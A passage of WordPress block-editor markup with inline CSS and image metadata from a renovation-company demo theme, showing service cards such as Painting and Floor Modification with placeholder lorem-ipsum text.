target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"726b9dd2-2c08-402d-b70f-e184ed0c21fc\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-726b9dd2-2c08-402d-b70f-e184ed0c21fc .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-726b9dd2-2c08-402d-b70f-e184ed0c21fc\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"0873ea34-7706-4a98-aca7-fb1d4c1bd7dc\"} -->\n<style type=\"text/css\"> .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0873ea34-7706-4a98-aca7-fb1d4c1bd7dc skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Painting</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"a12cea8d-712a-4459-b2cf-bcaf4cd28aa2\",\"topPadding\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-a12cea8d-712a-4459-b2cf-bcaf4cd28aa2.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"0e124042-d205-4388-bbab-642fedafff11\"} -->\n<style type=\"text/css\"> .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0e124042-d205-4388-bbab-642fedafff11 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-0e124042-d205-4388-bbab-642fedafff11 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"4489ec69-9114-4ceb-8836-b89abbc88c47\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-4489ec69-9114-4ceb-8836-b89abbc88c47 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-4489ec69-9114-4ceb-8836-b89abbc88c47\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":\"2021-05-28T05:39:15.000Z\",\"filename\":\"floor-modification.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"alt\":\"\",\"title\":\"floor-modification\",\"caption\":\"\",\"description\":\"\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/floor-modification.jpg\",\"id\":258,\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/floor-modification/\",\"author\":\"1\",\"name\":\"floor-modification\",\"status\":\"inherit\",\"modified\":\"2021-05-28T05:39:15.000Z\",\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"dc1b7f19b6\",\"delete\":\"1f29bf8951\",\"edit\":\"ed86f5af8b\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=258u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":9306,\"filesizeHumanReadable\":\"9 KB\",\"context\":\"\",\"height\":66,\"width\":111,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/floor-modification.jpg\",\"height\":66,\"width\":111,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":111,\"resshowPrefix\":false,\"counterId\":\"32d1bc82-ef5a-4ca9-b067-6248c321704c\"} -->\n<style type=\"text/css\"> .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img {\n width: 111px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-32d1bc82-ef5a-4ca9-b067-6248c321704c skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/floor-modification.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Floor Modification</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/floor-modification/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"7acb5b00-e12a-4e09-b190-fd5d15bfa0e8\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-7acb5b00-e12a-4e09-b190-fd5d15bfa0e8\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 